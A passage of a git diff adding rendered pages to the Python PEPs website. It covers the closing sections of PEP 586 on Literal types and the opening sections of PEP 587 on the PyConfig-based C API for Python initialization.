+    def transpose(self) -> Matrix[B, A]: ...
+
+foo: Matrix[Literal[2], Literal[3]] = Matrix(...)
+bar: Matrix[Literal[3], Literal[7]] = Matrix(...)
+
+baz = foo @ bar
+reveal_type(baz)  # Revealed type is 'Matrix[Literal[2], Literal[7]]'
+
+
+

Similarly, it is legal to construct TypeVars with value restrictions +or bounds involving Literal types:

+
T = TypeVar('T', Literal["a"], Literal["b"], Literal["c"])
+S = TypeVar('S', bound=Literal["foo"])
+
+
+

…although it is unclear when it would ever be useful to construct a +TypeVar with a Literal upper bound. For example, the S TypeVar in +the above example is essentially pointless: we can get equivalent behavior +by using S = Literal["foo"] instead.

+

Note: Literal types and generics deliberately interact in only very +basic and limited ways. In particular, libraries that want to type check +code containing a heavy amount of numeric or numpy-style manipulation will +almost certainly likely find Literal types as proposed in this PEP to be +insufficient for their needs.

+

We considered several different proposals for fixing this, but ultimately +decided to defer the problem of integer generics to a later date. See +Rejected or out-of-scope ideas for more details.

+
+
+

Interactions with enums and exhaustiveness checks

+

Type checkers should be capable of performing exhaustiveness checks when +working Literal types that have a closed number of variants, such as +enums. For example, the type checker should be capable of inferring that +the final else statement must be of type str, since all three +values of the Status enum have already been exhausted:

+
class Status(Enum):
+    SUCCESS = 0
+    INVALID_DATA = 1
+    FATAL_ERROR = 2
+
+def parse_status(s: Union[str, Status]) -> None:
+    if s is Status.SUCCESS:
+        print("Success!")
+    elif s is Status.INVALID_DATA:
+        print("The given data is invalid because...")
+    elif s is Status.FATAL_ERROR:
+        print("Unexpected fatal error...")
+    else:
+        # 's' must be of type 'str' since all other options are exhausted
+        print("Got custom status: " + s)
+
+
+

The interaction described above is not new: it’s already +codified within PEP 484. +However, many type +checkers (such as mypy) do not yet implement this due to the expected +complexity of the implementation work.

+

Some of this complexity will be alleviated once Literal types are introduced: +rather than entirely special-casing enums, we can instead treat them as being +approximately equivalent to the union of their values and take advantage of any +existing logic regarding unions, exhaustibility, type narrowing, reachability, +and so forth the type checker might have already implemented.

+

So here, the Status enum could be treated as being approximately equivalent +to Literal[Status.SUCCESS, Status.INVALID_DATA, Status.FATAL_ERROR] +and the type of s narrowed accordingly.

+
+
+

Interactions with narrowing

+

Type checkers may optionally perform additional analysis for both enum and +non-enum Literal types beyond what is described in the section above.

+

For example, it may be useful to perform narrowing based on things like +containment or equality checks:

+
def parse_status(status: str) -> None:
+    if status in ("MALFORMED", "ABORTED"):
+        # Type checker could narrow 'status' to type
+        # Literal["MALFORMED", "ABORTED"] here.
+        return expects_bad_status(status)
+
+    # Similarly, type checker could narrow 'status' to Literal["PENDING"]
+    if status == "PENDING":
+        expects_pending_status(status)
+
+
+

It may also be useful to perform narrowing taking into account expressions +involving Literal bools. For example, we can combine Literal[True], +Literal[False], and overloads to construct “custom type guards”:

+
@overload
+def is_int_like(x: Union[int, List[int]]) -> Literal[True]: ...
+@overload
+def is_int_like(x: object) -> bool: ...
+def is_int_like(x): ...
+
+vector: List[int] = [1, 2, 3]
+if is_int_like(vector):
+    vector.append(3)
+else:
+    vector.append("bad")   # This branch is inferred to be unreachable
+
+scalar: Union[int, str]
+if is_int_like(scalar):
+    scalar += 3      # Type checks: type of 'scalar' is narrowed to 'int'
+else:
+    scalar += "foo"  # Type checks: type of 'scalar' is narrowed to 'str'
+
+
+
+
+

Interactions with Final

+

PEP 591 proposes adding a “Final” qualifier to the typing +ecosystem. This qualifier can be used to declare that some variable or +attribute cannot be reassigned:

+
foo: Final = 3
+foo = 4           # Error: 'foo' is declared to be Final
+
+
+

Note that in the example above, we know that foo will always be equal to +exactly 3. A type checker can use this information to deduce that foo +is valid to use in any context that expects a Literal[3]:

+
def expects_three(x: Literal[3]) -> None: ...
+
+expects_three(foo)  # Type checks, since 'foo' is Final and equal to 3
+
+
+

The Final qualifier serves as a shorthand for declaring that a variable +is effectively Literal.

+

If both this PEP and PEP 591 are accepted, type checkers are expected to +support this shortcut. Specifically, given a variable or attribute assignment +of the form var: Final = value where value is a valid parameter for +Literal[...], type checkers should understand that var may be used in +any context that expects a Literal[value].

+

Type checkers are not obligated to understand any other uses of Final. For +example, whether or not the following program type checks is left unspecified:

+
# Note: The assignment does not exactly match the form 'var: Final = value'.
+bar1: Final[int] = 3
+expects_three(bar1)  # May or may not be accepted by type checkers
+
+# Note: "Literal[1 + 2]" is not a legal type.
+bar2: Final = 1 + 2
+expects_three(bar2)  # May or may not be accepted by type checkers
+
+
+
+
+
+

Rejected or out-of-scope ideas

+

This section outlines some potential features that are explicitly out-of-scope.

+
+

True dependent types/integer generics

+

This proposal is essentially describing adding a very simplified +dependent type system to the PEP 484 ecosystem. One obvious extension +would be to implement a full-fledged dependent type system that lets users +predicate types based on their values in arbitrary ways. That would +let us write signatures like the below:

+
# A vector has length 'n', containing elements of type 'T'
+class Vector(Generic[N, T]): ...
+
+# The type checker will statically verify our function genuinely does
+# construct a vector that is equal in length to "len(vec1) + len(vec2)"
+# and will throw an error if it does not.
+def concat(vec1: Vector[A, T], vec2: Vector[B, T]) -> Vector[A + B, T]:
+    # ...snip...
+
+
+

At the very least, it would be useful to add some form of integer generics.

+

Although such a type system would certainly be useful, it’s out of scope +for this PEP: it would require a far more substantial amount of implementation +work, discussion, and research to complete compared to the current proposal.

+

It’s entirely possible we’ll circle back and revisit this topic in the future: +we very likely will need some form of dependent typing along with other +extensions like variadic generics to support popular libraries like numpy.

+

This PEP should be seen as a stepping stone towards this goal, +rather than an attempt at providing a comprehensive solution.

+
+
+

Adding more concise syntax

+

One objection to this PEP is that having to explicitly write Literal[...] +feels verbose. For example, instead of writing:

+
def foobar(arg1: Literal[1], arg2: Literal[True]) -> None:
+    pass
+
+
+

…it would be nice to instead write:

+
def foobar(arg1: 1, arg2: True) -> None:
+    pass
+
+
+

Unfortunately, these abbreviations simply will not work with the +existing implementation of typing at runtime. For example, the +following snippet crashes when run using Python 3.7:

+
from typing import Tuple
+
+# Supposed to accept tuple containing the literals 1 and 2
+def foo(x: Tuple[1, 2]) -> None:
+    pass
+
+
+

Running this yields the following exception:

+
TypeError: Tuple[t0, t1, ...]: each t must be a type. Got 1.
+
+
+

We don’t want users to have to memorize exactly when it’s ok to elide +Literal, so we require Literal to always be present.

+

A little more broadly, we feel overhauling the syntax of types in +Python is not within the scope of this PEP: it would be best to have +that discussion in a separate PEP, instead of attaching it to this one. +So, this PEP deliberately does not try and innovate Python’s type syntax.

+
+
+
+

Backporting the Literal type

+

Once this PEP is accepted, the Literal type will need to be backported for +Python versions that come bundled with older versions of the typing module. +We plan to do this by adding Literal to the typing_extensions 3rd party +module, which contains a variety of other backported types.

+
+
+

Implementation

+

The mypy type checker currently has implemented a large subset of the behavior +described in this spec, with the exception of enum Literals and some of the +more complex narrowing interactions described above.

+
+ +
+

Acknowledgements

+

Thanks to Mark Mendoza, Ran Benita, Rebecca Chen, and the other members of +typing-sig for their comments on this PEP.

+

Additional thanks to the various participants in the mypy and typing issue +trackers, who helped provide a lot of the motivation and reasoning behind +this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0586.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0587/index.html b/pep-0587/index.html new file mode 100644 index 00000000000..d8d295cd774 --- /dev/null +++ b/pep-0587/index.html @@ -0,0 +1,1881 @@ + + + + + + + + PEP 587 – Python Initialization Configuration | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 587 – Python Initialization Configuration

+
+
Author:
+
Victor Stinner <vstinner at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Thomas Wouters <thomas at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Mar-2019
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a new C API to configure the Python Initialization providing finer +control on the whole configuration and better error reporting.

+

It becomes possible to read the configuration and then override some +computed parameters before it is applied. It also becomes possible to +completely override how Python computes the module search paths +(sys.path).

+

The new Isolated Configuration provides sane default values to +isolate Python from the system. For example, to embed Python into an +application. Using the environment are now opt-in options, rather than +an opt-out options. For example, environment variables, command line +arguments and global configuration variables are ignored by default.

+

Building a customized Python which behaves as the regular Python becomes +easier using the new Py_RunMain() function. Moreover, using the +Python Configuration, PyConfig.argv arguments are now parsed the +same way the regular Python parses command line arguments, and +PyConfig.xoptions are handled as -X opt command line options.

+

This extracts a subset of the API design from the PEP 432 development +and refactoring work that is now considered sufficiently stable to make +public (allowing 3rd party embedding applications access to the same +configuration APIs that the native CPython CLI is now using).

+
+
+

Rationale

+

Python is highly configurable but its configuration evolved organically. +The initialization configuration is scattered all around the code using +different ways to set them: global configuration variables (ex: +Py_IsolatedFlag), environment variables (ex: PYTHONPATH), +command line arguments (ex: -b), configuration files (ex: +pyvenv.cfg), function calls (ex: Py_SetProgramName()). A +straightforward and reliable way to configure Python is needed.

+

Some configuration parameters are not accessible from the C API, or not +easily. For example, there is no API to override the default values of +sys.executable.

+

Some options like PYTHONPATH can only be set using an environment +variable which has a side effect on Python child processes if not unset +properly.

+

Some options also depends on other options: see Priority and Rules. +Python 3.7 API does not provide a consistent view of the overall +configuration.

+

The C API of Python 3.7 Initialization takes wchar_t* strings as +input whereas the Python filesystem encoding is set during the +initialization which can lead to mojibake.

+

Python 3.7 APIs like Py_Initialize() aborts the process on memory +allocation failure which is not convenient when Python is embedded. +Moreover, Py_Main() could exit directly the process rather than +returning an exit code. Proposed new API reports the error or exit code +to the caller which can decide how to handle it.

+

Implementing the PEP 540 (UTF-8 Mode) and the new -X dev correctly +was almost impossible in Python 3.6. The code base has been deeply +reworked in Python 3.7 and then in Python 3.8 to read the configuration +into a structure with no side effect. It becomes possible to clear the +configuration (release memory) and read again the configuration if the +encoding changed . It is required to implement properly the UTF-8 which +changes the encoding using -X utf8 command line option. Internally, +bytes argv strings are decoded from the filesystem encoding. The +-X dev changes the memory allocator (behaves as +PYTHONMALLOC=debug), whereas it was not possible to change the +memory allocation while parsing the command line arguments. The new +design of the internal implementation not only allowed to implement +properly -X utf8 and -X dev, it also allows to change the Python +behavior way more easily, especially for corner cases like that, and +ensure that the configuration remains consistent: see Priority and +Rules.

+

This PEP is a partial implementation of PEP 432 which is the overall +design. New fields can be added later to PyConfig structure to +finish the implementation of the PEP 432 (e.g. by adding a new partial +initialization API which allows to configure Python using Python objects to +finish the full initialization). However, those features are omitted from this +PEP as even the native CPython CLI doesn’t work that way - the public API +proposal in this PEP is limited to features which have already been implemented +and adopted as private APIs for us in the native CPython CLI.

+
+
+

Python Initialization C API

+

This PEP proposes to add the following new structures and functions.

+

New structures:

+
    +
  • PyConfig
  • +
  • PyPreConfig
  • +
  • PyStatus
  • +
  • PyWideStringList
  • +
+

New functions:

+
    +
  • PyConfig_Clear(config)
  • +
  • PyConfig_InitIsolatedConfig()
  • +
  • PyConfig_InitPythonConfig()
  • +
  • PyConfig_Read(config)
  • +
  • PyConfig_SetArgv(config, argc, argv)
  • +
  • PyConfig_SetBytesArgv(config, argc, argv)
  • +
  • PyConfig_SetBytesString(config, config_str, str)
  • +
  • PyConfig_SetString(config, config_str, str)
  • +
  • PyPreConfig_InitIsolatedConfig(preconfig)
  • +
  • PyPreConfig_InitPythonConfig(preconfig)
  • +
  • PyStatus_Error(err_msg)
  • +
  • PyStatus_Exception(status)
  • +
  • PyStatus_Exit(exitcode)
  • +
  • PyStatus_IsError(status)
  • +
  • PyStatus_IsExit(status)
  • +
  • PyStatus_NoMemory()
  • +
  • PyStatus_Ok()
  • +
  • PyWideStringList_Append(list, item)
  • +
  • PyWideStringList_Insert(list, index, item)
  • +
  • Py_BytesMain(argc, argv)
  • +
  • Py_ExitStatusException(status)
  • +
  • Py_InitializeFromConfig(config)
  • +
  • Py_PreInitialize(preconfig)
  • +
  • Py_PreInitializeFromArgs(preconfig, argc, argv)
  • +
  • Py_PreInitializeFromBytesArgs(preconfig, argc, argv)
  • +
  • Py_RunMain()
  • +
+

This PEP also adds _PyRuntimeState.preconfig (PyPreConfig type) +and PyInterpreterState.config (PyConfig type) fields to these +internal structures. PyInterpreterState.config becomes the new +reference configuration, replacing global configuration variables and +other private variables.

+
+

PyWideStringList

+

PyWideStringList is a list of wchar_t* strings.

+

PyWideStringList structure fields:

+
    +
  • length (Py_ssize_t)
  • +
  • items (wchar_t**)
  • +
+

Methods:

+
    +
  • PyStatus PyWideStringList_Append(PyWideStringList *list, const wchar_t *item): +Append item to list.
  • +
  • PyStatus PyWideStringList_Insert(PyWideStringList *list, Py_ssize_t index, const wchar_t *item): +Insert item into list at index. If index is greater than +list length, just append item to list.
  • +
+

If length is non-zero, items must be non-NULL and all strings must +be non-NULL.

+
+
+

PyStatus

+

PyStatus is a structure to store the status of an initialization +function: success, error or exit. For an error, it can store the C +function name which created the error.

+

Example:

+
PyStatus alloc(void **ptr, size_t size)
+{
+    *ptr = PyMem_RawMalloc(size);
+    if (*ptr == NULL) {
+        return PyStatus_NoMemory();
+    }
+    return PyStatus_Ok();
+}
+
+int main(int argc, char **argv)
+{
+    void *ptr;
+    PyStatus status = alloc(&ptr, 16);
+    if (PyStatus_Exception(status)) {
+        Py_ExitStatusException(status);
+    }
+    PyMem_Free(ptr);
+    return 0;
+}
+
+
+

PyStatus fields:

+
    +
  • exitcode (int): +Argument passed to exit().
  • +
  • err_msg (const char*): +Error message.
  • +
  • func (const char *): +Name of the function which created an error, can be NULL.
  • +
  • private _type field: for internal usage only.
  • +
+

Functions to create a status:

+
    +
  • PyStatus_Ok(): Success.
  • +
  • PyStatus_Error(err_msg): Initialization error with a message.
  • +
  • PyStatus_NoMemory(): Memory allocation failure (out of memory).
  • +
  • PyStatus_Exit(exitcode): Exit Python with the specified exit code.
  • +
+

Functions to handle a status:

+
    +
  • PyStatus_Exception(status): Is the result an error or an exit? +If true, the exception must be handled; by calling +Py_ExitStatusException(status) for example.
  • +
  • PyStatus_IsError(status): Is the result an error?
  • +
  • PyStatus_IsExit(status): Is the result an exit?
  • +
  • Py_ExitStatusException(status): Call exit(exitcode) if status +is an exit. Print the error messageand exit with a non-zero exit code +if status is an error. Must only be called if +PyStatus_Exception(status) is true.
  • +
+
+

Note

+

Internally, Python uses macros which set PyStatus.func, +whereas functions to create a status set func to NULL.

+
+
+
+

Preinitialization with PyPreConfig

+

The PyPreConfig structure is used to preinitialize Python:

+
    +
  • Set the Python memory allocator
  • +
  • Configure the LC_CTYPE locale
  • +
  • Set the UTF-8 mode
  • +
+

Example using the preinitialization to enable the UTF-8 Mode:

+
PyStatus status;
+PyPreConfig preconfig;
+
+PyPreConfig_InitPythonConfig(&preconfig);
+
+preconfig.utf8_mode = 1;
+
+status = Py_PreInitialize(&preconfig);
+if (PyStatus_Exception(status)) {
+    Py_ExitStatusException(status);
+}
+
+/* at this point, Python will speak UTF-8 */
+
+Py_Initialize();
+/* ... use Python API here ... */
+Py_Finalize();
+
+
+

Function to initialize a preconfiguration:

+
    +
  • PyStatus PyPreConfig_InitIsolatedConfig(PyPreConfig *preconfig)
  • +
  • PyStatus PyPreConfig_InitPythonConfig(PyPreConfig *preconfig)
  • +
+

Functions to preinitialize Python:

+
    +
  • PyStatus Py_PreInitialize(const PyPreConfig *preconfig)
  • +
  • PyStatus Py_PreInitializeFromBytesArgs(const PyPreConfig *preconfig, int argc, char * const *argv)
  • +
  • PyStatus Py_PreInitializeFromArgs(const PyPreConfig *preconfig, int argc, wchar_t * const * argv)
  • +
+

The caller is responsible to handle exceptions (error or exit) using +PyStatus_Exception() and Py_ExitStatusException().

+

For Python Configuration (PyPreConfig_InitPythonConfig()), +if Python is initialized with command line arguments, the command line +arguments must also be passed to preinitialize Python, since they have +an effect on the pre-configuration like encodings. For example, the +-X utf8 command line option enables the UTF-8 Mode.

+

PyPreConfig fields:

+
    +
  • allocator (int): +Name of the memory allocator (ex: PYMEM_ALLOCATOR_MALLOC). Valid +values:
      +
    • PYMEM_ALLOCATOR_NOT_SET (0): don’t change memory allocators +(use defaults)
    • +
    • PYMEM_ALLOCATOR_DEFAULT (1): default memory allocators
    • +
    • PYMEM_ALLOCATOR_DEBUG (2): default memory allocators with +debug hooks
    • +
    • PYMEM_ALLOCATOR_MALLOC (3): force usage of malloc()
    • +
    • PYMEM_ALLOCATOR_MALLOC_DEBUG (4): force usage of +malloc() with debug hooks
    • +
    • PYMEM_ALLOCATOR_PYMALLOC (5): Python “pymalloc” allocator
    • +
    • PYMEM_ALLOCATOR_PYMALLOC_DEBUG (6): Python “pymalloc” +allocator with debug hooks
    • +
    • Note: PYMEM_ALLOCATOR_PYMALLOC and +PYMEM_ALLOCATOR_PYMALLOC_DEBUG are not supported if Python is +configured using --without-pymalloc
    • +
    +
  • +
  • configure_locale (int): +Set the LC_CTYPE locale to the user preferred locale? If equals to 0, +set coerce_c_locale and coerce_c_locale_warn to 0.
  • +
  • coerce_c_locale (int): +If equals to 2, coerce the C locale; if equals to 1, read the LC_CTYPE +locale to decide if it should be coerced.
  • +
  • coerce_c_locale_warn (int): +If non-zero, emit a warning if the C locale is coerced.
  • +
  • dev_mode (int): +See PyConfig.dev_mode.
  • +
  • isolated (int): +See PyConfig.isolated.
  • +
  • legacy_windows_fs_encoding (int, Windows only): +If non-zero, disable UTF-8 Mode, set the Python filesystem encoding to +mbcs, set the filesystem error handler to replace.
  • +
  • parse_argv (int): +If non-zero, Py_PreInitializeFromArgs() and +Py_PreInitializeFromBytesArgs() parse their argv argument the +same way the regular Python parses command line arguments: see +Command Line Arguments.
  • +
  • use_environment (int): +See PyConfig.use_environment.
  • +
  • utf8_mode (int): +If non-zero, enable the UTF-8 mode.
  • +
+

The legacy_windows_fs_encoding field is only available on Windows. +#ifdef MS_WINDOWS macro can be used for Windows specific code.

+

PyPreConfig private fields, for internal use only:

+
    +
  • _config_init (int): +Function used to initialize PyConfig, used for preinitialization.
  • +
+

PyMem_SetAllocator() can be called after Py_PreInitialize() and +before Py_InitializeFromConfig() to install a custom memory +allocator. It can be called before Py_PreInitialize() if +allocator is set to PYMEM_ALLOCATOR_NOT_SET (default value).

+

Python memory allocation functions like PyMem_RawMalloc() must not +be used before Python preinitialization, whereas calling directly +malloc() and free() is always safe. Py_DecodeLocale() must +not be called before the preinitialization.

+
+
+

Initialization with PyConfig

+

The PyConfig structure contains most parameters to configure Python.

+

Example setting the program name:

+
void init_python(void)
+{
+    PyStatus status;
+
+    PyConfig config;
+    PyConfig_InitPythonConfig(&config);
+
+    /* Set the program name. Implicitly preinitialize Python. */
+    status = PyConfig_SetString(&config, &config.program_name,
+                                L"/path/to/my_program");
+    if (PyStatus_Exception(status)) {
+        goto fail;
+    }
+
+    status = Py_InitializeFromConfig(&config);
+    if (PyStatus_Exception(status)) {
+        goto fail;
+    }
+    PyConfig_Clear(&config);
+    return;
+
+fail:
+    PyConfig_Clear(&config);
+    Py_ExitStatusException(status);
+}
+
+
+

PyConfig methods:

+
    +
  • void PyConfig_InitPythonConfig(PyConfig *config) +Initialize configuration with Python Configuration.
  • +
  • void PyConfig_InitIsolatedConfig(PyConfig *config): +Initialize configuration with Isolated Configuration.
  • +
  • PyStatus PyConfig_SetString(PyConfig *config, wchar_t * const *config_str, const wchar_t *str): +Copy the wide character string str into *config_str. +Preinitialize Python if needed.
  • +
  • PyStatus PyConfig_SetBytesString(PyConfig *config, wchar_t * const *config_str, const char *str): +Decode str using Py_DecodeLocale() and set the result into +*config_str. +Preinitialize Python if needed.
  • +
  • PyStatus PyConfig_SetArgv(PyConfig *config, int argc, wchar_t * const *argv): +Set command line arguments from wide character strings. +Preinitialize Python if needed.
  • +
  • PyStatus PyConfig_SetBytesArgv(PyConfig *config, int argc, char * const *argv): +Set command line arguments: decode bytes using Py_DecodeLocale(). +Preinitialize Python if needed.
  • +
  • PyStatus PyConfig_Read(PyConfig *config): +Read all Python configuration. Fields which are already initialized +are left unchanged. +Preinitialize Python if needed.
  • +
  • void PyConfig_Clear(PyConfig *config): +Release configuration memory.
  • +
+

Most PyConfig methods preinitialize Python if needed. In that case, +the Python preinitialization configuration in based on the PyConfig. +If configuration fields which are in common with PyPreConfig are +tuned, they must be set before calling a PyConfig method:

+
    +
  • dev_mode
  • +
  • isolated
  • +
  • parse_argv
  • +
  • use_environment
  • +
+

Moreover, if PyConfig_SetArgv() or PyConfig_SetBytesArgv() is +used, this method must be called first, before other methods, since the +preinitialization configuration depends on command line arguments (if +parse_argv is non-zero).

+

Functions to initialize Python:

+
    +
  • PyStatus Py_InitializeFromConfig(const PyConfig *config): +Initialize Python from config configuration.
  • +
+

The caller of these methods and functions is responsible to handle +exceptions (error or exit) using PyStatus_Exception() and +Py_ExitStatusException().

+

PyConfig fields:

+
    +
  • argv (PyWideStringList): +Command line arguments, sys.argv. See parse_argv to parse +argv the same way the regular Python parses Python command line +arguments. If argv is empty, an empty string is added to ensure +that sys.argv always exists and is never empty.
  • +
  • base_exec_prefix (wchar_t*): +sys.base_exec_prefix.
  • +
  • base_prefix (wchar_t*): +sys.base_prefix.
  • +
  • buffered_stdio (int): +If equals to 0, enable unbuffered mode, making the stdout and stderr streams +unbuffered.
  • +
  • bytes_warning (int): +If equals to 1, issue a warning when comparing bytes or +bytearray with str, or comparing bytes with int. If +equal or greater to 2, raise a BytesWarning exception.
  • +
  • check_hash_pycs_mode (wchar_t*): +--check-hash-based-pycs command line option value (see PEP 552). +Valid values: always, never and default. The default value +is default.
  • +
  • configure_c_stdio (int): +If non-zero, configure C standard streams (stdio, stdout, +stdout). For example, set their mode to O_BINARY on Windows.
  • +
  • dev_mode (int): +Development mode
  • +
  • dump_refs (int): +If non-zero, dump all objects which are still alive at exit. +Require a special Python build with Py_REF_DEBUG macro defined.
  • +
  • exec_prefix (wchar_t*): +sys.exec_prefix.
  • +
  • executable (wchar_t*): +sys.executable.
  • +
  • faulthandler (int): +If non-zero, call faulthandler.enable().
  • +
  • filesystem_encoding (wchar_t*): +Filesystem encoding, sys.getfilesystemencoding().
  • +
  • filesystem_errors (wchar_t*): +Filesystem encoding errors, sys.getfilesystemencodeerrors().
  • +
  • use_hash_seed (int), +hash_seed (unsigned long): +Randomized hash function seed.
  • +
  • home (wchar_t*): +Python home directory.
  • +
  • import_time (int): +If non-zero, profile import time.
  • +
  • inspect (int): +Enter interactive mode after executing a script or a command.
  • +
  • install_signal_handlers (int): +Install signal handlers?
  • +
  • interactive (int): +Interactive mode.
  • +
  • isolated (int): +If greater than 0, enable isolated mode:
      +
    • sys.path contains neither the script’s directory (computed from +argv[0] or the current directory) nor the user’s site-packages +directory.
    • +
    • Python REPL doesn’t import readline nor enable default readline +configuration on interactive prompts.
    • +
    • Set use_environment and user_site_directory to 0.
    • +
    +
  • +
  • legacy_windows_stdio (int, Windows only): +If non-zero, use io.FileIO instead of WindowsConsoleIO for +sys.stdin, sys.stdout and sys.stderr.
  • +
  • malloc_stats (int): +If non-zero, dump statistics on pymalloc memory allocator at exit. +The option is ignored if Python is built using --without-pymalloc.
  • +
  • pythonpath_env (wchar_t*): +Module search paths as a string separated by DELIM (usually : +character). +Initialized from PYTHONPATH environment variable value by default.
  • +
  • module_search_paths_set (int), +module_search_paths (PyWideStringList): +sys.path. If module_search_paths_set is equal to 0, the +module_search_paths is overridden by the function computing the +Path Configuration.
  • +
  • optimization_level (int): +Compilation optimization level:
      +
    • 0: Peephole optimizer (and __debug__ is set to True)
    • +
    • 1: Remove assertions, set __debug__ to False
    • +
    • 2: Strip docstrings
    • +
    +
  • +
  • parse_argv (int): +If non-zero, parse argv the same way the regular Python command +line arguments, and strip Python arguments from argv: see Command +Line Arguments.
  • +
  • parser_debug (int): +If non-zero, turn on parser debugging output (for expert only, +depending on compilation options).
  • +
  • pathconfig_warnings (int): +If equal to 0, suppress warnings when computing the path +configuration (Unix only, Windows does not log any warning). Otherwise, +warnings are written into stderr.
  • +
  • prefix (wchar_t*): +sys.prefix.
  • +
  • program_name (wchar_t*): +Program name.
  • +
  • pycache_prefix (wchar_t*): +.pyc cache prefix.
  • +
  • quiet (int): +Quiet mode. For example, don’t display the copyright and version +messages even in interactive mode.
  • +
  • run_command (wchar_t*): +python3 -c COMMAND argument.
  • +
  • run_filename (wchar_t*): +python3 FILENAME argument.
  • +
  • run_module (wchar_t*): +python3 -m MODULE argument.
  • +
  • show_alloc_count (int): +Show allocation counts at exit? +Need a special Python build with COUNT_ALLOCS macro defined.
  • +
  • show_ref_count (int): +Show total reference count at exit? +Need a debug build of Python (Py_REF_DEBUG macro should be +defined).
  • +
  • site_import (int): +Import the site module at startup?
  • +
  • skip_source_first_line (int): +Skip the first line of the source?
  • +
  • stdio_encoding (wchar_t*), +stdio_errors (wchar_t*): +Encoding and encoding errors of sys.stdin, sys.stdout +and sys.stderr.
  • +
  • tracemalloc (int): +If non-zero, call tracemalloc.start(value).
  • +
  • user_site_directory (int): +If non-zero, add user site directory to sys.path.
  • +
  • verbose (int): +If non-zero, enable verbose mode.
  • +
  • warnoptions (PyWideStringList): +Options of the warnings module to build warnings filters.
  • +
  • write_bytecode (int): +If non-zero, write .pyc files.
  • +
  • xoptions (PyWideStringList): +sys._xoptions.
  • +
+

The legacy_windows_stdio field is only available on Windows. +#ifdef MS_WINDOWS macro can be used for Windows specific code.

+

If parse_argv is non-zero, argv arguments are parsed the same +way the regular Python parses command line arguments, and Python +arguments are stripped from argv: see Command Line Arguments.

+

The xoptions options are parsed to set other options: see -X +Options.

+

PyConfig private fields, for internal use only:

+
    +
  • _config_init (int): +Function used to initialize PyConfig, used for preinitialization.
  • +
  • _install_importlib (int): +Install importlib?
  • +
  • _init_main (int): +If equal to 0, stop Python initialization before the “main” phase +(see PEP 432).
  • +
+

More complete example modifying the default configuration, read the +configuration, and then override some parameters:

+
PyStatus init_python(const char *program_name)
+{
+    PyStatus status;
+
+    PyConfig config;
+    PyConfig_InitPythonConfig(&config);
+
+    /* Set the program name before reading the configuration
+       (decode byte string from the locale encoding).
+
+       Implicitly preinitialize Python. */
+    status = PyConfig_SetBytesString(&config, &config.program_name,
+                                  program_name);
+    if (PyStatus_Exception(status)) {
+        goto done;
+    }
+
+    /* Read all configuration at once */
+    status = PyConfig_Read(&config);
+    if (PyStatus_Exception(status)) {
+        goto done;
+    }
+
+    /* Append our custom search path to sys.path */
+    status = PyWideStringList_Append(&config.module_search_paths,
+                                  L"/path/to/more/modules");
+    if (PyStatus_Exception(status)) {
+        goto done;
+    }
+
+    /* Override executable computed by PyConfig_Read() */
+    status = PyConfig_SetString(&config, &config.executable,
+                                L"/path/to/my_executable");
+    if (PyStatus_Exception(status)) {
+        goto done;
+    }
+
+    status = Py_InitializeFromConfig(&config);
+
+done:
+    PyConfig_Clear(&config);
+    return status;
+}
+
+
+
+

Note

+

PyImport_FrozenModules, PyImport_AppendInittab() and +PyImport_ExtendInittab() functions are still relevant and +continue to work as previously. They should be set or called after +Python preinitialization and before the Python initialization.

+
+
+
+

Isolated Configuration

+

PyPreConfig_InitIsolatedConfig() and +PyConfig_InitIsolatedConfig() functions create a configuration to +isolate Python from the system. For example, to embed Python into an +application.

+

This configuration ignores global configuration variables, environments +variables and command line arguments (argv is not parsed). The C +standard streams (ex: stdout) and the LC_CTYPE locale are left +unchanged by default.

+

Configuration files are still used with this configuration. Set the +Path Configuration (“output fields”) to ignore these configuration +files and avoid the function computing the default path configuration.

+
+
+

Python Configuration

+

PyPreConfig_InitPythonConfig() and PyConfig_InitPythonConfig() +functions create a configuration to build a customized Python which +behaves as the regular Python.

+

Environments variables and command line arguments are used to configure +Python, whereas global configuration variables are ignored.

+

This function enables C locale coercion (PEP 538) and UTF-8 Mode (PEP +540) depending on the LC_CTYPE locale, PYTHONUTF8 and +PYTHONCOERCECLOCALE environment variables.

+

Example of customized Python always running in isolated mode:

+
int main(int argc, char **argv)
+{
+    PyStatus status;
+
+    PyConfig config;
+    PyConfig_InitPythonConfig(&config);
+
+    config.isolated = 1;
+
+    /* Decode command line arguments.
+       Implicitly preinitialize Python (in isolated mode). */
+    status = PyConfig_SetBytesArgv(&config, argc, argv);
+    if (PyStatus_Exception(status)) {
+        goto fail;
+    }
+
+    status = Py_InitializeFromConfig(&config);
+    if (PyStatus_Exception(status)) {
+        goto fail;
+    }
+    PyConfig_Clear(&config);
+
+    return Py_RunMain();
+
+fail:
+    PyConfig_Clear(&config);
+    if (PyStatus_IsExit(status)) {
+        return status.exitcode;
+    }
+    /* Display the error message and exit the process with
+       non-zero exit code */
+    Py_ExitStatusException(status);
+}
+
+
+

This example is a basic implementation of the “System Python Executable” +discussed in PEP 432.

+
+
+

Path Configuration

+

PyConfig contains multiple fields for the path configuration:

+
    +
  • Path configuration input fields:
      +
    • home
    • +
    • pythonpath_env
    • +
    • pathconfig_warnings
    • +
    +
  • +
  • Path configuration output fields:
      +
    • exec_prefix
    • +
    • executable
    • +
    • prefix
    • +
    • module_search_paths_set, module_search_paths
    • +
    +
  • +
+

If at least one “output field” is not set, Python computes the path +configuration to fill unset fields. If module_search_paths_set is +equal to 0, module_search_paths is overridden and +module_search_paths_set is set to 1.

+

It is possible to completely ignore the function computing the default +path configuration by setting explicitly all path configuration output +fields listed above. A string is considered as set even if it is non-empty. +module_search_paths is considered as set if +module_search_paths_set is set to 1. In this case, path +configuration input fields are ignored as well.

+

Set pathconfig_warnings to 0 to suppress warnings when computing the +path configuration (Unix only, Windows does not log any warning).

+

If base_prefix or base_exec_prefix fields are not set, they +inherit their value from prefix and exec_prefix respectively.

+

Py_RunMain() and Py_Main() modify sys.path:

+
